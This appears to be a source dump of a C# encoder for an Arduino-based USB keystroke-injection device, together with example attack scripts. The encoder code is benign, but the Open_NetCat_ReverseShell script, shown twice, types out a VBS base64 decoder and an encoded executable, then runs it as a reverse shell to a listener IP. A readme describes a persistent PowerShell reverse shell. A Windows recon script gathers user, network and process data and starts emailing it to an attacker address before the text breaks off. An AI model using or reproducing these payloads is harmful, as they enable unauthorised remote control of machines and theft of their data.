}
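-------------------------------------------------------------------------------- /Encoder/Form1.cs: --------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.IO;

namespace DuckyEncoder
{
    // Main window of the encoder. It loads a plain-text command script and writes
    // its byte encoding to "script.bin" in the current working directory.
    //
    // Output format (one byte per value, as consumed by Arduino/Ducky_Clone.ino):
    //   0..249    key codes / characters
    //   250 (FA)  set key-press delay, followed by one byte (milliseconds)
    //   251       start of a multi-key combination
    //   252 / 253 Windows ALT-code sequence on / off
    //   254       end of a multi-key combination
    //   255 (FF)  delay command, followed by two bytes (count, unit)
    // Because the control codes share the byte range with ordinary characters,
    // script text must never produce a byte in 250..255 (see writeText).
    public partial class frm_Main : Form
    {
        private const int OpKeyDelay = 250;
        private const int OpMultiStart = 251;
        private const int OpAltOn = 252;
        private const int OpAltOff = 253;
        private const int OpMultiEnd = 254;
        private const int OpDelay = 255;

        // Unit byte written after the delay count (0x32 = 50).
        private const int DelayUnitMs = 50;
        // Largest count that fits in the single count byte of a delay command.
        private const int MaxDelayUnits = 255;

        // Accept Windows, Unix and old Mac line endings in the loaded script.
        private static readonly string[] LineBreaks = new string[] { "\r\n", "\n", "\r" };

        // Names of special keys accepted in a script and the key code written for each.
        private static readonly Dictionary<string, int> SpecialKeys = new Dictionary<string, int>
        {
            { "CTRL", 128 }, { "SHIFT", 129 }, { "ALT", 130 }, { "GUI", 131 },
            { "CTRLR", 132 }, { "SHIFTR", 133 }, { "ALTGR", 134 }, { "GUI_R", 135 },
            { "ESC", 177 }, { "BACKSPACE", 178 }, { "TAB", 179 }, { "CAPS_LOCK", 193 },
            { "F1", 194 }, { "F2", 195 }, { "F3", 196 }, { "F4", 197 },
            { "F5", 198 }, { "F6", 199 }, { "F7", 200 }, { "F8", 201 },
            { "F9", 202 }, { "F10", 203 }, { "F11", 204 }, { "F12", 205 },
            { "INS", 209 }, { "HOME", 210 }, { "PAGE_UP", 211 }, { "DEL", 212 },
            { "PAGE_DOWN", 214 }, { "RHT", 215 }, { "LFT", 216 }, { "DWN", 217 },
            { "UP", 218 }, { "MENU", 237 }
        };

        public frm_Main()
        {
            InitializeComponent();
        }

        // Text of the script most recently loaded with the 'Load' button.
        String ScriptToExecute = "";
        // Open only while button3_Click is encoding; null otherwise.
        BinaryWriter dataStreamWriter;
        // Keyboard layout used for character substitution: "US" (default) or "UK".
        String mapType = "US";

        #region "Command Processing"

        // Returns the part of 'line' starting at 'start', or "" when the line is
        // shorter than that (a bare command with no argument).
        private static String argumentOf(String line, int start)
        {
            return line.Length > start ? line.Substring(start) : "";
        }

        // Removes spaces and embedded line breaks from a command argument.
        private static String stripBlanks(String text)
        {
            return text.Replace(" ", "").Replace(System.Environment.NewLine, "");
        }

        // Encodes one script line. The command is recognised by its prefix, in
        // the order tested below; anything else is treated as a key combination
        // ("A + B") or a single special key. Unrecognised single keys are ignored.
        // Throws on malformed arguments; encodeScript reports the error.
        private void processLine(String comline)
        {
            if (comline.StartsWith("STRING", StringComparison.Ordinal))
            {
                // Send the string chars one at a time
                sendData(argumentOf(comline, 7));
            }
            else if (comline.StartsWith("DELAY", StringComparison.Ordinal))
            {
                // Wait given millisecs
                writeDelay(Convert.ToInt32(argumentOf(comline, 6)));
            }
            else if (comline.StartsWith("REM", StringComparison.Ordinal))
            {
                // Remark line - just ignore it.
            }
            else if (comline.StartsWith("ENTER", StringComparison.Ordinal))
            {
                // Send a Return ('B0')
                sendData((byte)176);
            }
            else if (comline.StartsWith("COMD", StringComparison.Ordinal))
            {
                // Send full command line plus return
                sendCommandData(argumentOf(comline, 5));
            }
            else if (comline.StartsWith("KEY", StringComparison.Ordinal))
            {
                // Windows ALT key combo (eg. 'ALT + 0124'), typed on the number pad.
                // Translate every digit first so a malformed argument is rejected
                // before anything is written.
                String digits = stripBlanks(argumentOf(comline, 4));
                int[] padCodes = new int[digits.Length];
                for (int i = 0; i < digits.Length; i++)
                {
                    padCodes[i] = getNumericPad(digits[i]);
                }

                sendData(OpAltOn);
                foreach (int padCode in padCodes)
                {
                    sendData(padCode);
                }
                sendData(OpAltOff);
            }
            else if (comline.StartsWith("MAP", StringComparison.Ordinal))
            {
                mapType = stripBlanks(argumentOf(comline, 4));
            }
            else if (comline.StartsWith("WAITKEY", StringComparison.Ordinal))
            {
                // Alter default key 'down' time in msecs. Values outside 5..250
                // are ignored, which leaves the current setting in place.
                int del = Convert.ToInt32(stripBlanks(argumentOf(comline, 7)));
                if (del > 4 && del < 251)
                {
                    sendData(OpKeyDelay);
                    sendData(del);
                }
            }
            else if (comline.IndexOf("+", StringComparison.Ordinal) > 0)
            {
                // Multi-Key Special Character. The original called
                // Replace("\\r?\\n", ""), which looks for that literal text and so
                // never removed anything; strip real line-break characters instead.
                String combo = comline.Replace("\r", "").Replace("\n", "");
                String[] parts = combo.Split(new String[] { "+" }, StringSplitOptions.RemoveEmptyEntries);

                sendData(OpMultiStart);
                foreach (String part in parts)
                {
                    String keyName = part.Replace(" ", "");
                    int code = getKeyCode(keyName);
                    if (code > 0)
                    {
                        sendData(code);
                    }
                    else
                    {
                        // Not a named key: send the text itself (eg. the 'y' of "ALT + y")
                        sendData(keyName);
                    }
                }
                sendData(OpMultiEnd);
            }
            else
            {
                // Single Special Key
                int code = getKeyCode(comline.Replace(" ", ""));
                if (code > 0)
                {
                    sendData(code);
                }
            }
        }

        // Writes a delay of at least 'millis' milliseconds as one or more
        // 3-byte delay commands (255, count, 50). The count is a single byte, so
        // long delays are split; the original masked the count to 8 bits, which
        // silently turned e.g. 13000 ms (260 units) into 4 units.
        // NOTE(review): assumes the firmware waits count * unit ms per command -
        // its delay handling is not visible here; confirm against Ducky_Clone.ino.
        private void writeDelay(int millis)
        {
            if (millis <= 0)
            {
                return;
            }

            // Round up to whole 50 ms units without risking int overflow.
            int units = millis / DelayUnitMs + (millis % DelayUnitMs != 0 ? 1 : 0);
            while (units > 0)
            {
                int chunk = Math.Min(units, MaxDelayUnits);
                sendData(OpDelay);
                sendData(chunk);
                sendData(DelayUnitMs);
                units -= chunk;
            }
        }

        // Returns the key code for a named special key, or -1 when the name is
        // not known. Names are case-sensitive.
        private int getKeyCode(String subcom)
        {
            int code;
            if (subcom != null && SpecialKeys.TryGetValue(subcom, out code))
            {
                return code;
            }
            return -1;
        }

        // Needed because of the keycode differences between US and UK keyboards.
        // Others are not supported: any other map type returns the input unchanged.
        private char replaceKey(char inp)
        {
            if (mapType != "UK")
            {
                return inp;
            }

            switch (inp)
            {
                case '@':
                    return '"';
                case '"':
                    return '@';
                case '#':
                    return (char)186;
                case '~':
                    return '|';
                case '/':
                    return (char)192;
                case '\\':
                    return (char)0xec;
                default:
                    return inp;
            }
        }

        // Returns the numeric-pad key code for a decimal digit:
        // '1'..'9' map to 225..233 and '0' maps to 234.
        // Throws FormatException for anything that is not a digit; the original
        // returned an unrelated code for such input.
        int getNumericPad(char inx)
        {
            if (inx < '0' || inx > '9')
            {
                throw new FormatException(
                    string.Format("KEY accepts decimal digits only, found '{0}'.", inx));
            }
            return inx == '0' ? 234 : 224 + (inx - '0');
        }
        #endregion


        #region "Stream IO methods"

        // Writes the low 8 bits of 'value' as one byte. Write(byte) emits the same
        // byte as the original Write((sbyte)...) without relying on an unchecked
        // narrowing cast.
        private void writeByte(int value)
        {
            dataStreamWriter.Write((byte)(value & 0xff));
        }

        // Writes each character of 'text' as one byte, applying the layout
        // substitution. Characters at or above 250 are rejected: 250..255 would be
        // read back as control codes, and anything above 255 used to be truncated
        // to an unrelated byte.
        private void writeText(String text)
        {
            foreach (char c in text)
            {
                if ((int)c >= OpKeyDelay)
                {
                    throw new NotSupportedException(
                        string.Format("Character U+{0:X4} cannot be encoded.", (int)c));
                }

                if (mapType == "UK" && c == '|')
                {
                    sendUKPipe();
                }
                else
                {
                    writeByte(replaceKey(c));
                }
            }
        }

        // Writes 'inputx' followed by a newline character.
        void sendCommandData(String inputx)
        {
            writeText(inputx + "\n");
        }

        // Writes the characters of 'inpx'.
        private void sendData(String inpx)
        {
            writeText(inpx);
        }

        // Writes one raw key code; on the UK map a pipe (0x7C) is written as the
        // key combination from sendUKPipe instead.
        private void sendData(byte inx)
        {
            if (mapType == "UK" && inx == 0x7C)
            {
                sendUKPipe();
            }
            else
            {
                writeByte(inx);
            }
        }

        // Writes the low 8 bits of 'ipx' with no layout handling.
        private void sendData(int ipx)
        {
            writeByte(ipx);
        }

        // Writes the pipe character for the UK map as a multi-key combination:
        // start (251), 129 (SHIFT), 0xEC, end (254).
        private void sendUKPipe()
        {
            sendData(OpMultiStart);
            sendData(129);
            sendData(0xec);
            sendData(OpMultiEnd);
        }

        #endregion


        // Encodes a loaded script line by line into dataStreamWriter.
        // Returns true when every line was encoded, false after the first error
        // (which is shown to the user). Encoding stops at the first error, so the
        // output file is incomplete in that case.
        private bool encodeScript(String file)
        {
            try
            {
                // A MAP command in a previously encoded script must not leak into this one.
                mapType = "US";

                String[] lines = file.Split(LineBreaks, StringSplitOptions.RemoveEmptyEntries);
                foreach (String line in lines)
                {
                    processLine(line);
                }
                return true;
            }
            catch (Exception ex)
            {
                errDisp(ex);
                return false;
            }
        }

        // 'Close' button.
        private void button2_Click(object sender, EventArgs e)
        {
            this.Close();
        }

        // 'Load' button: lets the user pick a script file and reads it into memory.
        private void button1_Click(object sender, EventArgs e)
        {
            this.label2.Text = "";
            openFileDialog1.Multiselect = false;
            openFileDialog1.Title = "Load Ducky Script File";
            if (openFileDialog1.ShowDialog() != System.Windows.Forms.DialogResult.OK)
            {
                return;
            }

            try
            {
                // 'using' releases the file handle even when the read fails.
                using (StreamReader reader = new StreamReader(openFileDialog1.FileName))
                {
                    ScriptToExecute = reader.ReadToEnd();
                }
                textBox1.Text = openFileDialog1.FileName.ToString();
                this.label2.Text = "PRESS 'ENCODE' TO MAKE SCRIPT";
                this.label2.ForeColor = Color.Blue;
            }
            catch (Exception ex)
            {
                errDisp(ex);
            }
        }

        // 'Encode' button: writes the encoded script to "script.bin" in the current
        // working directory, replacing any existing file of that name.
        private void button3_Click(object sender, EventArgs e)
        {
            if (textBox1.Text.Length > 5)
            {
                try
                {
                    // FileMode.Create truncates an existing file, so no separate delete
                    // is needed (the original tested for a misspelt "sctipt.bin").
                    bool encoded;
                    dataStreamWriter = new BinaryWriter(new FileStream("script.bin", FileMode.Create));
                    try
                    {
                        encoded = encodeScript(ScriptToExecute);
                    }
                    finally
                    {
                        dataStreamWriter.Close();
                        dataStreamWriter = null;
                    }

                    // Only claim success when no line failed; the original always
                    // overwrote the error label with the OK message.
                    if (encoded)
                    {
                        this.label2.Text = "DUCKY SCRIPT GENERATED OK";
                        this.label2.ForeColor = Color.Red;
                    }
                }
                catch (Exception ex)
                {
                    errDisp(ex);
                }
            }
            else
            {
                this.label2.Text = "PLEASE 'LOAD' A SOURCE FILE ABOVE";
                this.label2.ForeColor = Color.Red;
            }
        }

        // Shows an error state on the status label and the exception message in a dialog.
        private void errDisp(Exception ex)
        {
            this.label2.Text = "ERROR";
            this.label2.ForeColor = Color.Red;
            MessageBox.Show(ex.Message.ToString());
        }

        // Sets the initial status prompt when the form opens.
        private void frm_Main_Load(object sender, EventArgs e)
        {
            this.label2.Text = "PRESS 'LOAD' TO SELECT FILE";
            this.label2.ForeColor = Color.Blue;
        }

    }
}
-------------------------------------------------------------------------------- /Encoder/Form1.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, 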
PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | -------------------------------------------------------------------------------- /Encoder/Open_NetCat_ReverseShell_8080.txt: -------------------------------------------------------------------------------- 1 | DELAY 2000 2 | GUI 3 | DELAY 500 4 | STRING cmd.exe 5 | DELAY 1000 6 | MENU 7 | DELAY 100 8 | STRING a 9 | DELAY 250 10 | ENTER 11 | DELAY 1300 12 | ALT + y 13 | DELAY 1000 14 | STRING copy con c:\decoder.vbs 15 | ENTER 16 | DELAY 1000 17 | STRING Option Explicit 18 | ENTER 19 | STRING Dim arguments, inFile, outFile 20 | ENTER 21 | STRING Set arguments = WScript.Arguments 22 | ENTER 23 | STRING inFile = arguments(0) 24 | ENTER 25 | STRING outFile = arguments(1) 26 | ENTER 27 | STRING Dim base64Encoded, base64Decoded, outByteArray 28 | ENTER 29 | STRING dim objFS 30 | ENTER 31 | STRING dim objTS 32 | ENTER 33 | STRING set objFS = CreateObject("Scripting.FileSystemObject") 34 | ENTER 35 | STRING set objTS = objFS.OpenTextFile(inFile, 1) 36 | ENTER 37 | STRING base64Encoded = objTS.ReadAll 38 | ENTER 39 | STRING base64Decoded = decodeBase64(base64Encoded) 40 | ENTER 41 | STRING writeBytes outFile, base64Decoded 42 | ENTER 43 | STRING private function decodeBase64(base64) 44 | ENTER 45 | STRING dim DM, EL 46 | ENTER 47 | STRING Set DM = CreateObject("Microsoft.XMLDOM") 48 | ENTER 49 | STRING Set EL = DM.createElement("tmp") 50 | ENTER 51 | STRING EL.DataType = "bin.base64" 52 | ENTER 53 | STRING EL.Text = base64 54 | ENTER 55 | STRING decodeBase64 = EL.NodeTypedValue 56 | ENTER 57 | STRING end function 58 | ENTER 59 | STRING private Sub writeBytes(file, bytes) 60 | ENTER 61 | STRING Dim binaryStream 62 | ENTER 63 | STRING Set binaryStream = CreateObject("ADODB.Stream") 64 | ENTER 65 | STRING binaryStream.Type = 1 66 | ENTER 67 | STRING binaryStream.Open 68 | ENTER 69 | STRING binaryStream.Write bytes 70 | ENTER 71 | STRING binaryStream.SaveToFile file, 2 72 | ENTER 73 | STRING End Sub 74 | ENTER 
75 | CTRL + z 76 | ENTER 77 | STRING copy con c:\reverse.txt 78 | ENTER 79 | STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA 80 | ENTER 81 | STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA 82 | ENTER 83 | STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA 84 | ENTER 85 | STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 86 | ENTER 87 | STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS 88 | ENTER 89 | STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA 90 | ENTER 91 | STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 92 | ENTER 93 | STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A 94 | ENTER 95 | STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA 96 | ENTER 97 | STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA 98 | ENTER 99 | STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq 100 | ENTER 101 | STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF 102 | ENTER 103 | STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv 104 | ENTER 105 | STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp 106 | ENTER 107 | STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm 108 | ENTER 109 | STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A 110 | ENTER 111 | STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s 112 | ENTER 113 | STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 114 | ENTER 115 | STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp 116 | ENTER 117 | STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY 
118 | ENTER 119 | STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B 120 | ENTER 121 | STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk 122 | ENTER 123 | STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA 124 | ENTER 125 | STRING AAxAAADpdL7//wAAAAIAAAAMQAAA 126 | ENTER 127 | CTRL + z 128 | ENTER 129 | STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe 130 | ENTER 131 | STRING c:\reverse.exe 192.168.0.17 8080 132 | ENTER 133 | STRING exit 134 | ENTER -------------------------------------------------------------------------------- /Encoder/Output-Build.txt: -------------------------------------------------------------------------------- 1 | 1>------ Rebuild All started: Project: DuckyEncoder, Configuration: Debug Any CPU ------ 2 | 1> DuckyEncoder -> C:\Users\John\documents\visual studio 2013\Projects\DuckyEncoder\DuckyEncoder\bin\Debug\DuckyEncoder.exe 3 | ========== Rebuild All: 1 succeeded, 0 failed, 0 skipped ========== 4 | -------------------------------------------------------------------------------- /Encoder/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Windows.Forms; 4 | 5 | namespace DuckyEncoder 6 | { 7 | static class Program 8 | { 9 | /// 10 | /// The main entry point for the application. 
11 | /// 12 | [STAThread] 13 | static void Main() 14 | { 15 | Application.EnableVisualStyles(); 16 | Application.SetCompatibleTextRenderingDefault(false); 17 | Application.Run(new frm_Main()); 18 | } 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Encoder/UK_KeyboardTest.txt: -------------------------------------------------------------------------------- 1 | MAP UK 2 | DELAY 2000 3 | GUI 4 | DELAY 100 5 | STRING notepad.exe 6 | DELAY 100 7 | ENTER 8 | DELAY 1000 9 | STRING -------------UK Keyboard Character Test------------------- 10 | ENTER 11 | ENTER 12 | DELAY 200 13 | STRING !"$%^&*(){}[]<>:;,.'? 14 | ENTER 15 | STRING 1234567890 16 | ENTER 17 | STRING lower= abcdefghijklmnopqrstuvwxyz 18 | ENTER 19 | STRING upper= ABCDEFGHIJKLMNOPQRSTUVWXYZ 20 | ENTER 21 | DELAY 100 22 | STRING HASH # 23 | ENTER 24 | STRING TILDE ~ 25 | ENTER 26 | STRING PIPE | 27 | ENTER 28 | STRING AT SYMBOL @ 29 | ENTER 30 | STRING BACKSLASH / 31 | ENTER 32 | STRING FORWARD SLASH \ 33 | ENTER 34 | STRING BACKTICK ` 35 | ENTER 36 | STRING SINGLE QUOTE ' 37 | ENTER 38 | STRING DOUBLE QUOTE " 39 | ENTER 40 | STRING WINDOWS 'ALT-0124' TEST 41 | DELAY 50 42 | KEY 0124 43 | ENTER 44 | STRING [Character above should be a 'pipe'] 45 | ENTER 46 | STRING ------------------Test Complete----------------------- 47 | ENTER 48 | -------------------------------------------------------------------------------- /Examples/Open_NetCat_ReverseShell_8080.txt: -------------------------------------------------------------------------------- 1 | REM Test Script - Opens a netcat reverse shell on the target 2 | REM NetCat must be installed on the listener machine and 3 | REM and set running with command 'nc -l 8080' 4 | DELAY 2000 5 | GUI 6 | DELAY 500 7 | STRING cmd.exe 8 | DELAY 1000 9 | MENU 10 | DELAY 100 11 | STRING a 12 | DELAY 250 13 | ENTER 14 | DELAY 1300 15 | ALT + y 16 | DELAY 1000 17 | STRING copy con c:\decoder.vbs 18 | ENTER 19 | DELAY 1000 20 | 
STRING Option Explicit 21 | ENTER 22 | STRING Dim arguments, inFile, outFile 23 | ENTER 24 | STRING Set arguments = WScript.Arguments 25 | ENTER 26 | STRING inFile = arguments(0) 27 | ENTER 28 | STRING outFile = arguments(1) 29 | ENTER 30 | STRING Dim base64Encoded, base64Decoded, outByteArray 31 | ENTER 32 | STRING dim objFS 33 | ENTER 34 | STRING dim objTS 35 | ENTER 36 | STRING set objFS = CreateObject("Scripting.FileSystemObject") 37 | ENTER 38 | STRING set objTS = objFS.OpenTextFile(inFile, 1) 39 | ENTER 40 | STRING base64Encoded = objTS.ReadAll 41 | ENTER 42 | STRING base64Decoded = decodeBase64(base64Encoded) 43 | ENTER 44 | STRING writeBytes outFile, base64Decoded 45 | ENTER 46 | STRING private function decodeBase64(base64) 47 | ENTER 48 | STRING dim DM, EL 49 | ENTER 50 | STRING Set DM = CreateObject("Microsoft.XMLDOM") 51 | ENTER 52 | STRING Set EL = DM.createElement("tmp") 53 | ENTER 54 | STRING EL.DataType = "bin.base64" 55 | ENTER 56 | STRING EL.Text = base64 57 | ENTER 58 | STRING decodeBase64 = EL.NodeTypedValue 59 | ENTER 60 | STRING end function 61 | ENTER 62 | STRING private Sub writeBytes(file, bytes) 63 | ENTER 64 | STRING Dim binaryStream 65 | ENTER 66 | STRING Set binaryStream = CreateObject("ADODB.Stream") 67 | ENTER 68 | STRING binaryStream.Type = 1 69 | ENTER 70 | STRING binaryStream.Open 71 | ENTER 72 | STRING binaryStream.Write bytes 73 | ENTER 74 | STRING binaryStream.SaveToFile file, 2 75 | ENTER 76 | STRING End Sub 77 | ENTER 78 | CTRL + z 79 | ENTER 80 | STRING copy con c:\reverse.txt 81 | ENTER 82 | STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA 83 | ENTER 84 | STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA 85 | ENTER 86 | STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA 87 | ENTER 88 | STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 89 | ENTER 90 | STRING 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS 91 | ENTER 92 | STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA 93 | ENTER 94 | STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 95 | ENTER 96 | STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A 97 | ENTER 98 | STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA 99 | ENTER 100 | STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA 101 | ENTER 102 | STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq 103 | ENTER 104 | STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF 105 | ENTER 106 | STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv 107 | ENTER 108 | STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp 109 | ENTER 110 | STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm 111 | ENTER 112 | STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A 113 | ENTER 114 | STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s 115 | ENTER 116 | STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 117 | ENTER 118 | STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp 119 | ENTER 120 | STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY 121 | ENTER 122 | STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B 123 | ENTER 124 | STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk 125 | ENTER 126 | STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA 127 | ENTER 128 | STRING AAxAAADpdL7//wAAAAIAAAAMQAAA 129 | ENTER 130 | CTRL + z 131 | ENTER 132 | STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe 133 | ENTER 
134 | REM ----------------------------------------------------------- 135 | REM Change the listening machine address here 136 | STRING c:\reverse.exe 192.168.0.17 8080 137 | REM ----------------------------------------------------------- 138 | ENTER 139 | STRING exit 140 | ENTER -------------------------------------------------------------------------------- /Examples/readme: -------------------------------------------------------------------------------- 1 | Here are a number of script examples. 2 | 3 | The textSheel example is a fully working TCP Reverse Shell implemented using microsoft Powershell code. 4 | The script actually 'writes' the powershell script, saves it to a file, and then excutes the script. It also sets-up a scheduled job 5 | to execute the script after each reboot of the target machine. The shell will then form a command connection back to the attacker IP 6 | each time the target starts up. 7 | -------------------------------------------------------------------------------- /Examples/recon_script_win7_UK.txt: -------------------------------------------------------------------------------- 1 | REM WIN7 RECON SCRIPT - UK KEYBOARD VERSION 2 | MAP UK 3 | DELAY 2000 4 | GUI 5 | DELAY 800 6 | STRING cmd.exe 7 | DELAY 100 8 | ENTER 9 | DELAY 1000 10 | REM collect some data on the target machine 11 | STRING ipconfig > recon_data.txt & whoami >> recon_data.txt & getmac >> recon_data.txt 12 | DELAY 50 13 | ENTER 14 | DELAY 400 15 | STRING net user >> recon_data.txt & tasklist >> recon_data.txt & DIR Documents >> recon_data.txt 16 | DELAY 50 17 | ENTER 18 | DELAY 400 19 | REM email the recon_data.txt file back to attacker 20 | STRING powershell 21 | ENTER 22 | DELAY 750 23 | STRING $SMTPServer = 'smtp.gmail.com' 24 | ENTER 25 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 26 | ENTER 27 | STRING $SMTPInfo.EnableSsl = $true 28 | ENTER 29 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('hacker@googlemail.com', 
